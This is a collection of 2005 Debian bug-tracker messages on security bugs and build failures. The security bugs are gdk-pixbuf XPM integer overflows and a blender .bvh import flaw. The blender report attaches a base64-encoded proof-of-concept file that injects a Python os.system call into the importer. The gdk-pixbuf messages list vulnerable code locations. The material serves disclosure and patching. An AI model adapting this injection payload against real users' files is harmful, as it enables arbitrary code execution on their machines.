GNU/Linux -- The power of freedom -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject
Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code
Loic Minier wrote: An integer overflow in gdk-pixbuf's XPM rendering code can be exploited to overwrite the heap and exploit arbitrary code through crafted images. Please see www.idefense.com/application/poi/display?id=339type=vulnerabilities for more details. Did you identify other packages with a copy of this code? In particular, did you check Gtk 1? gdk-pixbuf from GTK1 is affected by CVE-2005-3186; the vulnerable code is present in io-xpm.c:359 The Redhat security advisory also fixes CVE-2005-2975, for which I see no entry in the Debian changelog, could you please investifate on this id and report whether gtk1 and gtk2 are affected for Debian? Redhat's advisories: http://rhn.redhat.com/errata/RHSA-2005-810.html http://rhn.redhat.com/errata/RHSA-2005-811.html Redhat bug for CVE-2005-2975 with two patches attached: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=171900 This is all for sid: gdk-pixbuf is both vulnerable to the integer overflow in pixels calculation (io-xpm.c:413), as to the endless loop DoS attack (io-xpm:284). gtk+2.0 is not vulnerable to the integer overflow in pixels calculation, as it allocates pixbuf through gdk_pixbuf_new(), but is vulnerable to the endless loop DoS (io-xpm.c:1170). Cheers, Moritz -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339136: marked as done (Changes in stat package output break apt-move)
Your message dated Wed, 16 Nov 2005 05:47:10 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#339136: fixed in coreutils 5.93-5 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 15 Nov 2005 05:06:13 + From [EMAIL PROTECTED] Mon Nov 14 21:06:13 2005 Return-path: [EMAIL PROTECTED] Received: from mailgw.cvut.cz ([147.32.3.235]) by spohr.debian.org with esmtp (Exim 4.50) id 1Ebt1I-0005F0-Ub for [EMAIL PROTECTED]; Mon, 14 Nov 2005 21:06:13 -0800 Received: from mailgw (localhost [127.0.0.1]) by mailgw.cvut.cz (Postfix) with SMTP id 138C413B6CD for [EMAIL PROTECTED]; Tue, 15 Nov 2005 06:06:12 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by mailgw.cvut.cz (Postfix) with ESMTP id EE01213B90E for [EMAIL PROTECTED]; Tue, 15 Nov 2005 06:06:11 +0100 (CET) Received: from mailgw.cvut.cz ([127.0.0.1]) by localhost (mailgw [127.0.0.1]) (amavisd-new, port 10024) with LMTP id 23935-01-69 for [EMAIL PROTECTED]; Tue, 15 Nov 2005 06:06:11 +0100 (CET) Received: from [127.0.0.1] (petr.vc.cvut.cz [147.32.240.142]) by mailgw.cvut.cz (Postfix) with ESMTP id D2A2D13B6CD for [EMAIL PROTECTED]; Tue, 15 Nov 2005 06:06:11 +0100 (CET) Message-ID: [EMAIL PROTECTED] Date: Tue, 15 Nov 2005 06:06:11 +0100 From: Petr Vandrovec [EMAIL PROTECTED] User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.7.12) Gecko/20051007 Debian/1.7.12-1 X-Accept-Language: cs, en MIME-Version: 1.0 To: [EMAIL PROTECTED] Subject: Changes in stat package output break apt-move Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE autolearn=no version=2.60-bugs.debian.org_2005_01_02 Package: coreutils Version: 5.93-2 Severity: critical Justification: renders apt-move unusable Hello, in the past 'stat -L -c %s / /' produced 4096 LF 4096 LF while now (since 5.93 update) it produces 40964096 without any explanation why this happened. This breaks at least apt-move and some programs I've written. But what's worse is that now stat does not provide any way how to get each of stat results on separate line - %s\n just generates 4096\n4096\n, without interpreting \n... Can you revert to the old behavior and provide special option for new (IMHO broken) one, or provide some method how to embed LF to the output without actually having LF embedded directly into shell scripts? Though I would prefer backward compatibility over even bigger incompatibility. See bug 339024 for apt-move's half of story. Thanks, Petr Vandrovec --- Received: (at 339136-close) by bugs.debian.org; 16 Nov 2005 13:51:28 + From [EMAIL PROTECTED] Wed Nov 16 05:51:28 2005 Return-path: [EMAIL PROTECTED] Received: from katie by spohr.debian.org with local (Exim 4.50) id 1EcNd0-0002DU-V9; Wed, 16 Nov 2005 05:47:10 -0800 From: Michael Stone [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.56 $ Subject: Bug#339136: fixed in coreutils 5.93-5 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 05:47:10 -0800 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 Source: coreutils Source-Version: 5.93-5 We believe that the bug you reported is fixed in the latest version of coreutils, which is due to be installed in the Debian FTP archive: coreutils_5.93-5.diff.gz to pool/main/c/coreutils/coreutils_5.93-5.diff.gz coreutils_5.93-5.dsc to pool/main/c/coreutils/coreutils_5.93-5.dsc coreutils_5.93-5_i386.deb to pool/main/c/coreutils/coreutils_5.93-5_i386.deb fileutils_5.93-5_all.deb to pool/main/c/coreutils/fileutils_5.93-5_all.deb shellutils_5.93-5_all.deb to pool/main/c/coreutils/shellutils_5.93-5_all.deb textutils_5.93-5_all.deb to pool/main/c/coreutils/textutils_5.93-5_all.deb A summary of the changes
Bug#335842: hmake FTBFS - error in confhc (and another error in HInteractive.hs)
Tags: patch Hi, the error Daniel reported, is caused by a difference in the new ghc6 (6.4.1), which produces an output of several lines instead of a only one-liner, when it precompiles (-E) the program, that consists only of: __GLASGOW_HASKELL__ Since scripts/confhc uses this output in function ghcsym() and creates lib/debian/config, I've modified this in patch_hmake_confhc.patch. However there is still another compile-error about multi-line-strings in src/interpreter/HInteractive.hs. (Sorry for not including error output here). I've also attached a patch to solve this (patch_hmake_hinteractive.patch). Cheers, Stefan. --- hmake-3.10.orig/script/confhc +++ hmake-3.10/script/confhc @@ -78,7 +78,7 @@ ghcsym () { echo __GLASGOW_HASKELL__ ghcsym.hs; $1 -E -cpp -optP-P ghcsym.hs -o ghcsym.out; - grep -v '^#' ghcsym.out $2; + grep -E '[0-9]+' ghcsym.out | grep -v '#' $2; rm -f ghcsym.hs ghcsym.out; } echo -n Looking for ghc... --- hmake-3.10.orig/src/interpreter/HInteractive.hs +++ hmake-3.10/src/interpreter/HInteractive.hs @@ -348,39 +348,39 @@ help = hi - help command does not work in hbc 0..5 #else -banner = \ -\__ __ __ _\n\ -\|| || _____ || _ hmake interactive (hi):\n\ -\||___|| || || || ___|| ||/ ||__|| Copyright (c) May 2000\n\ -\||---|| || || || ||__|| ||\\_ ||__http://www.cs.york.ac.uk/fp/hmake/\n\ -\|| ||Report bugs to: [EMAIL PROTECTED] -\|| || Version: ++hmakeVersion++- +banner = \ +__ __ __ _\n\ +|| || _____ || _ hmake interactive (hi):\n\ +||___|| || || || ___|| ||/ ||__|| Copyright (c) May 2000\n\ +||---|| || || || ||__|| ||\\_ ||__http://www.cs.york.ac.uk/fp/hmake/\n\ +|| ||Report bugs to: [EMAIL PROTECTED] +|| || Version: ++hmakeVersion++- -help = \ -\Commands (can be abbreviated to first letter):\n\ -\ expr evaluate expression\n\ -\ :type expr show type of expression [nhc98 only]\n\ -\ :quitquit\n\ -\ :Quitquit\n\ -\ :load mod [mod...] load modules (note, not filenames)\n\ -\ :loadclear all modules\n\ -\ :also mod [mod...] load additional modules (note, not filenames)\n\ -\ :reload repeat last load command\n\ -\ :freshen remove, recompile, and reload all current modules\n\ -\ :module mod set module scope for evaluating expressions\n\ -\ :edit file edit filename\n\ -\ :editedit current module\n\ -\ :cd dir change directory\n\ -\ :cd show current directory\n\ -\ :dir list current directory\n\ -\ :hc compiler set Haskell compiler to use\n\ -\ :hc show current compiler and other available compilers\n\ -\ :set options set hmake/compiler options\n\ -\ :unset options remove hmake/compiler options\n\ -\ :observe namedebug function 'name' with 'Hood' [coming soon]\n\ -\ :trace [on|off] switch on/off debugging with 'Hat' [nhc98 only]\n\ -\ :!commandshell escape\n\ -\ :version show hmake version\n\ -\ :? display this list of commands +help = \ +Commands (can be abbreviated to first letter):\n\ + expr evaluate expression\n\ + :type expr show type of expression [nhc98 only]\n\ + :quitquit\n\ + :Quitquit\n\ + :load mod [mod...] load modules (note, not filenames)\n\ + :loadclear all modules\n\ + :also mod [mod...] load additional modules (note, not filenames)\n\ + :reload repeat last load command\n\ + :freshen remove, recompile, and reload all current modules\n\ + :module mod set module scope for evaluating expressions\n\ + :edit file edit filename\n\ + :editedit current module\n\ + :cd dir change directory\n\ + :cd show current directory\n\ + :dir list current directory\n\ + :hc compiler set Haskell compiler to use\n\ + :hc show current compiler and other available compilers\n\ + :set options set hmake/compiler options\n\ + :unset options remove hmake/compiler options\n\ + :observe namedebug function 'name' with 'Hood' [coming soon]\n\ + :trace [on|off] switch on/off debugging with 'Hat' [nhc98 only]\n\ + :!commandshell escape\n\ + :version show hmake version\n\ + :? display this list of commands #endif pgpjrcIOV9GOy.pgp Description: PGP signature
Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code
Loic Minier wrote: The Redhat security advisory also fixes CVE-2005-2975, for which I see no entry in the Debian changelog, could you please investifate on this id and report whether gtk1 and gtk2 are affected for Debian? The vulnerability matrix for Woody and Sarge (the entries are the line numbers in io-xpm.c, where the vulnerable code is present): Woody gtk2 Woody gdk-pixbuf Sarge gtk2 Sarge gdk-pixbuf CVE-2005-29751170 2841170 284 CVE-2005-29761317 413 413 CVE-2005-31861255 3591256 359 Cheers, Moritz -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339469: helix-player: FTBFS due to different errors on all architectures
Package: helix-player Version: 1.0.6-2 Severity: serious Justification: no longer builds from source Tags: patch Hi, I just had a look at the helix-player package and noticed that it failed to build on all architectures. Each time it seems to be a different error. Btw, in Bug #330337 you list amd64 as supported, but not ia64. Is there a reason for that? For the sparc and powerpc the errors are listed below. sparc seems to be on a par with other architectures, while powerpc seems to be special since it crashed due to a python crash. A patch for this issue is attached and the package builds fine with the patch applied here. sparc: entering directory audio/device UNIXCompile(audio/device): generating makefiles Warning: Missing BIF source dep 'client_audiosvc' (include path ../../client/audiosvc/pub) UNIXCompile(audio/device): making depend UNIXCompile(audio/device): making copy ERROR: UNIXCompile(audio/device) ERROR: Make failed. --- Build System Error Make failed. --- leaving directory /build/buildd/helix-player-1.0.6/./audio/device [...] entering directory video/site UNIXCompile(video/site): generating makefiles UNIXCompile(video/site): making depend UNIXCompile(video/site): making copy ERROR: UNIXCompile(video/site) ERROR: Make failed. --- Build System Error Make failed. --- leaving directory /build/buildd/helix-player-1.0.6/./video/site Then there are similar messages for client/core, player/app/gtk, and player/installer/archive. Eventually the build fails with g++-3.4 --permissive -pipe -fsigned-char -O2 -I../../common/runtime/pub -I/usr/X11R6/include -Ipub/platform/unix -I../../common/system/pub/platform -I../../client/audiosvc/pub -I../../common/include -I../../common/container/pub -I../../common/util/pub -I../../common/system/pub -I../../common/dbgtool/pub -I../include -I./pub -I. -include rel/audio_device_ribodefs.h -fPIC -DPIC -o rel/obj/platform/unix/audlinux_oss.o -c platform/unix/audlinux_oss.cpp In file included from platform/unix/audlinux_oss.cpp:64: pub/platform/unix/audlinux_oss.h:63:31: machine/soundcard.h: No such file or directory platform/unix/audlinux_oss.cpp: In member function `virtual HX_RESULT CAudioOutLinux::_SetDeviceConfig(const HXAudioFormat*)': platform/unix/audlinux_oss.cpp:142: error: `SNDCTL_DSP_SETFRAGMENT' undeclared (first use this function) platform/unix/audlinux_oss.cpp:142: error: (Each undeclared identifier is reported only once for each function it appears in.) platform/unix/audlinux_oss.cpp:156: error: `AFMT_S16_NE' undeclared (first use this function) platform/unix/audlinux_oss.cpp:160: error: `AFMT_U8' undeclared (first use this function) platform/unix/audlinux_oss.cpp:163: error: `SNDCTL_DSP_SETFMT' undeclared (first use this function) platform/unix/audlinux_oss.cpp:205: error: `SOUND_PCM_WRITE_CHANNELS' undeclared (first use this function) platform/unix/audlinux_oss.cpp:216: error: `SOUND_PCM_WRITE_RATE' undeclared (first use this function) platform/unix/audlinux_oss.cpp:263: error: `audio_buf_info' undeclared (first use this function) platform/unix/audlinux_oss.cpp:263: error: expected `;' before getYourInfoHere platform/unix/audlinux_oss.cpp:269: error: `SNDCTL_DSP_GETOSPACE' undeclared (first use this function) platform/unix/audlinux_oss.cpp:269: error: `getYourInfoHere' undeclared (first use this function) platform/unix/audlinux_oss.cpp: In member function `void CAudioOutLinux::_SyncUpTimeStamps(ULONG32)': platform/unix/audlinux_oss.cpp:306: error: `SNDCTL_DSP_GETODELAY' undeclared (first use this function) platform/unix/audlinux_oss.cpp: In member function `virtual HX_RESULT CAudioOutLinux::_Reset()': platform/unix/audlinux_oss.cpp:491: error: `SOUND_PCM_RESET' undeclared (first use this function) platform/unix/audlinux_oss.cpp: In member function `virtual UINT16 CAudioOutLinux::_GetVolume() const': platform/unix/audlinux_oss.cpp:508: error: `SOUND_MIXER_PCM' undeclared (first use this function) platform/unix/audlinux_oss.cpp:508: error: `MIXER_READ' undeclared (first use this function) platform/unix/audlinux_oss.cpp: In member function `virtual HX_RESULT CAudioOutLinux::_SetVolume(UINT16)': platform/unix/audlinux_oss.cpp:530: error: `SOUND_MIXER_PCM' undeclared (first use this function) platform/unix/audlinux_oss.cpp:530: error: `MIXER_WRITE' undeclared (first use this function) platform/unix/audlinux_oss.cpp: In member function `virtual HX_RESULT CAudioOutLinux::_Drain()': platform/unix/audlinux_oss.cpp:549: error: `SNDCTL_DSP_SYNC' undeclared (first use this function) platform/unix/audlinux_oss.cpp: In member function `virtual HX_RESULT CAudioOutLinux::_GetRoomOnDevice(ULONG32) const': platform/unix/audlinux_oss.cpp:610: error:
Bug#330895: marked as done (blender [CVE-2005-3302]: Arbitrary code execution when importing a .bvh file)
Your message dated Wed, 16 Nov 2005 15:54:07 +0100 with message-id [EMAIL PROTECTED] and subject line Bug#330895: [CVE-2005-3302] blender: Arbitrary code execution when importing a .bvh file has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 30 Sep 2005 10:35:40 + From [EMAIL PROTECTED] Fri Sep 30 03:35:40 2005 Return-path: [EMAIL PROTECTED] Received: from smtp106.mail.sc5.yahoo.com [66.163.169.226] by spohr.debian.org with smtp (Exim 3.36 1 (Debian)) id 1ELIEu-0002iM-00; Fri, 30 Sep 2005 03:35:40 -0700 Received: (qmail 97672 invoked from network); 30 Sep 2005 10:35:39 - DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.es; h=Received:Subject:From:To:Content-Type:Date:Message-Id:Mime-Version:X-Mailer; b=4wYOFP+EotJRumRWsjkVCPy/fSrk2JymO2baE+VDx6qnPOREQq1RDRHIr3W5iKJQgDf+ooa1dWCuIsMALRkC29cmac+LIdFOCXKBLdBr32U0lQoDil4Htq2qsST6rwurAcoxOtqxJzK9K6Fuy6tOe0s/yLkPpT2SreYXP4u82hA= ; Received: from unknown (HELO ?192.168.1.5?) ([EMAIL PROTECTED] with plain) by smtp106.mail.sc5.yahoo.com with SMTP; 30 Sep 2005 10:35:38 - Subject: blender: Arbitrary code execution when importing a .bvh file From: Joxean Koret [EMAIL PROTECTED] To: [EMAIL PROTECTED] Content-Type: multipart/signed; micalg=pgp-sha1; protocol=application/pgp-signature; boundary==-3gjzVCLQTlWu2kr0pk8a Date: Fri, 30 Sep 2005 12:51:35 +0200 Message-Id: [EMAIL PROTECTED] Mime-Version: 1.0 X-Mailer: Evolution 2.0.4 Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-3.0 required=4.0 tests=BAYES_00 autolearn=no version=2.60-bugs.debian.org_2005_01_02 --=-3gjzVCLQTlWu2kr0pk8a Content-Type: multipart/mixed; boundary==-HbkGIVJARM52mmemKKWz --=-HbkGIVJARM52mmemKKWz Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Subject: blender: Arbitrary code execution when importing a .bvh file Package: blender Version: 2.36-1 Severity: grave Justification: user security hole The bvh_import.py script supplied with the current Debian Stable and (I think) unstable versions of Blender is vulnerable to arbitrary code execution. The problem was corrected at 2005/01/22 in the CVS but the main package=20 doesn't come with the fixed script. Attached goes the e-mail sended to the Blender people, one working exploit to test the vulnerability under Debian, and 2 proof of concepts. Regards, Joxean Koret -- System Information: Debian Release: 3.1 Architecture: i386 (i686) Kernel: Linux 2.6.11-1-386 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=3DISO-8859-15) Versions of packages blender depends on: ii gettext [libg 0.14.4-2 GNU Internationalization utilities ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an ii libfreetype6 2.1.7-2.4 FreeType 2 font engine, shared lib ii libgcc1 1:3.4.3-13 GCC support library ii libjpeg62 6b-10 The Independent JPEG Group's JPEG=20 ii libopenal00.2004090900-1.1 OpenAL is a portable library for 3 ii libpng12-01.2.8rel-1 PNG library - runtime ii libsdl1.2debi 1.2.7+1.2.8cvs20041007-4.1 Simple DirectMedia Layer ii libstdc++51:3.3.5-13 The GNU Standard C++ Library v3 ii libx11-6 4.3.0.dfsg.1-14X Window System protocol client li ii python2.3 2.3.5-4An interactive high-level object-o ii xlibmesa-gl [ 4.3.0.dfsg.1-14Mesa 3D graphics library [XFree86] ii xlibmesa-glu 4.3.0.dfsg.1-14Mesa OpenGL utility library [XFree ii xlibs 4.3.0.dfsg.1-14X Keyboard Extension (XKB) configu ii zlib1g1:1.2.2-4.sarge.2 compression library - runtime -- no debconf information --=-HbkGIVJARM52mmemKKWz Content-Disposition: attachment; filename=exploit.bvh Content-Type: text/plain; name=exploit.bvh; charset=ISO-8859-15 Content-Transfer-Encoding: base64 SElFUkFSQ0hZDQpST09UIEpveGVhbg0Kew0KICBPRkZTRVQgX19pbXBvcnRfXygnb3MnKS5zeXN0 ZW0oJ3RvdWNoJytjaHIoMzIpKycvdG1wL2J2aF9pbXBvcnRfZXhwbG9pdCcpICAwLjAwMDAwMCAg MC4wMDAwMDAgDQp9DQpNT1RJT04NCkZyYW1lczogMjUwDQpGcmFtZSBUaW1lOiAwLjMzMzMwMCAN Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0K DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoN
Bug#337439: marked as done (php-pager: FTBFS: Can't rm -*/package.xml)
Your message dated Wed, 16 Nov 2005 06:32:13 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#337439: fixed in php-pager 2.3.4-3 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 4 Nov 2005 12:08:35 + From [EMAIL PROTECTED] Fri Nov 04 04:08:35 2005 Return-path: [EMAIL PROTECTED] Received: from srv-smtp.math.univ-rennes1.fr [129.20.36.164] by spohr.debian.org with esmtp (Exim 3.36 1 (Debian)) id 1EY0N1-00056a-00; Fri, 04 Nov 2005 04:08:35 -0800 Received: from frobnitz.homelinux.net (dyn37033.math.univ-rennes1.fr [129.20.37.33]) by srv-smtp.math.univ-rennes1.fr (Postfix) with ESMTP id 5C971B887 for [EMAIL PROTECTED]; Fri, 4 Nov 2005 13:08:04 +0100 (CET) Received: from daniel by frobnitz.homelinux.net with local (Exim 4.54) id 1EY0MW-0007ZB-8f for [EMAIL PROTECTED]; Fri, 04 Nov 2005 13:08:04 +0100 To: Debian Bug Tracking System [EMAIL PROTECTED] Subject: php-pager: FTBFS: Can't rm -*/package.xml Message-Id: [EMAIL PROTECTED] From: Daniel Schepler [EMAIL PROTECTED] Date: Fri, 04 Nov 2005 13:08:04 +0100 Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-7.0 required=4.0 tests=BAYES_00,HAS_PACKAGE, HTML_10_20 autolearn=no version=2.60-bugs.debian.org_2005_01_02 Package: php-pager Severity: serious Version: 2.3.4-2 From my pbuilder build log: ... fakeroot debian/rules clean dpkg-parsechangelog: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) debian: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) dpkg-parsechangelog: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) debian: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) 500 Can't connect to pear.php.net:80 (Bad protocol 'tcp') http://pear.php.net/dtd/package-1.0 Handler couldn't resolve external entity at line 2, column 62, byte 102 error in processing external entity reference at line 2, column 62, byte 102: ?xml version=1.0 encoding=UTF-8 ? !DOCTYPE package SYSTEM http://pear.php.net/dtd/package-1.0; =^ package version=1.0 packagerversion=1.4.1 namePager/name at /usr/lib/perl5/XML/Parser.pm line 187 500 Can't connect to pear.php.net:80 (Bad protocol 'tcp') http://pear.php.net/dtd/package-1.0 Handler couldn't resolve external entity at line 2, column 62, byte 102 error in processing external entity reference at line 2, column 62, byte 102: ?xml version=1.0 encoding=UTF-8 ? !DOCTYPE package SYSTEM http://pear.php.net/dtd/package-1.0; =^ package version=1.0 packagerversion=1.4.1 namePager/name at /usr/lib/perl5/XML/Parser.pm line 187 test -x debian/rules test `id -u` = 0 if test -n test != .; then rmdir ; fi if test . != .; then rmdir .; fi dh_clean rm -f -*/package.xml rm: invalid option -- * Try `rm --help' for more information. make: *** [clean] Error 1 -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.14-1-686 Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) --- Received: (at 337439-close) by bugs.debian.org; 16 Nov 2005 14:41:30 + From [EMAIL PROTECTED] Wed Nov 16 06:41:29 2005 Return-path: [EMAIL PROTECTED] Received: from katie by spohr.debian.org with local (Exim 4.50) id 1EcOKb-0004SG-Gw; Wed, 16 Nov 2005 06:32:13 -0800 From: Charles Fry [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.56 $ Subject: Bug#337439: fixed in php-pager 2.3.4-3 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 06:32:13 -0800 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 Source: php-pager Source-Version: 2.3.4-3 We believe that the bug you reported is fixed in the latest version of php-pager, which is due to be installed in the Debian FTP archive:
Bug#337437: marked as done (php-cache-lite: FTBFS: can't rm -*/package.xml (missing Build-Depends?))
Your message dated Wed, 16 Nov 2005 06:32:11 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#337437: fixed in php-cache-lite 1.5.2-3 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 4 Nov 2005 12:05:40 + From [EMAIL PROTECTED] Fri Nov 04 04:05:40 2005 Return-path: [EMAIL PROTECTED] Received: from srv-smtp.math.univ-rennes1.fr [129.20.36.164] by spohr.debian.org with esmtp (Exim 3.36 1 (Debian)) id 1EY0KC-0002wc-00; Fri, 04 Nov 2005 04:05:40 -0800 Received: from frobnitz.homelinux.net (dyn37033.math.univ-rennes1.fr [129.20.37.33]) by srv-smtp.math.univ-rennes1.fr (Postfix) with ESMTP id 3E3AFB887 for [EMAIL PROTECTED]; Fri, 4 Nov 2005 13:05:09 +0100 (CET) Received: from daniel by frobnitz.homelinux.net with local (Exim 4.54) id 1EY0Jh-000729-2L for [EMAIL PROTECTED]; Fri, 04 Nov 2005 13:05:09 +0100 To: Debian Bug Tracking System [EMAIL PROTECTED] Subject: php-cache-lite: FTBFS: can't rm -*/package.xml (missing Build-Depends?) Message-Id: [EMAIL PROTECTED] From: Daniel Schepler [EMAIL PROTECTED] Date: Fri, 04 Nov 2005 13:05:09 +0100 Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-7.0 required=4.0 tests=BAYES_00,HAS_PACKAGE, HTML_10_20 autolearn=no version=2.60-bugs.debian.org_2005_01_02 Package: php-cache-lite Severity: serious Version: 1.5.2-2 From my pbuilder build log: ... fakeroot debian/rules clean dpkg-parsechangelog: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) debian: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) dpkg-parsechangelog: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) debian: warning: no utmp entry available and LOGNAME not defined; using uid of process (0) 500 Can't connect to pear.php.net:80 (Bad protocol 'tcp') http://pear.php.net/dtd/package-1.0 Handler couldn't resolve external entity at line 2, column 62, byte 107 error in processing external entity reference at line 2, column 62, byte 107: ?xml version=1.0 encoding=ISO-8859-1 ? !DOCTYPE package SYSTEM http://pear.php.net/dtd/package-1.0; =^ package version=1.0 nameCache_Lite/name at /usr/lib/perl5/XML/Parser.pm line 187 500 Can't connect to pear.php.net:80 (Bad protocol 'tcp') http://pear.php.net/dtd/package-1.0 Handler couldn't resolve external entity at line 2, column 62, byte 107 error in processing external entity reference at line 2, column 62, byte 107: ?xml version=1.0 encoding=ISO-8859-1 ? !DOCTYPE package SYSTEM http://pear.php.net/dtd/package-1.0; =^ package version=1.0 nameCache_Lite/name at /usr/lib/perl5/XML/Parser.pm line 187 test -x debian/rules test `id -u` = 0 if test -n test != .; then rmdir ; fi if test . != .; then rmdir .; fi dh_clean rm -f -*/package.xml rm: invalid option -- * Try `rm --help' for more information. make: *** [clean] Error 1 Adding netbase to the Build-Depends allows the package to build. But if the messages about pear.php.net indicate that network access is currently required to build the package, this is a serious problem also. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.14-1-686 Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8) --- Received: (at 337437-close) by bugs.debian.org; 16 Nov 2005 14:41:34 + From [EMAIL PROTECTED] Wed Nov 16 06:41:33 2005 Return-path: [EMAIL PROTECTED] Received: from katie by spohr.debian.org with local (Exim 4.50) id 1EcOKZ-0004Rm-8h; Wed, 16 Nov 2005 06:32:11 -0800 From: Charles Fry [EMAIL PROTECTED] To: [EMAIL PROTECTED] X-Katie: $Revision: 1.56 $ Subject: Bug#337437: fixed in php-cache-lite 1.5.2-3 Message-Id: [EMAIL PROTECTED] Sender: Archive Administrator [EMAIL PROTECTED] Date: Wed, 16 Nov 2005 06:32:11 -0800 X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no
Processed: Fixed in upload of gtk+2.0 2.8.7-1 to experimental
Processing commands for [EMAIL PROTECTED]: tag 339431 + fixed-in-experimental Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code Tags were: patch security Tags added: fixed-in-experimental quit Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#337442: marked as done (php-simpletest: FTBFS: Can't rm -*/package.xml)
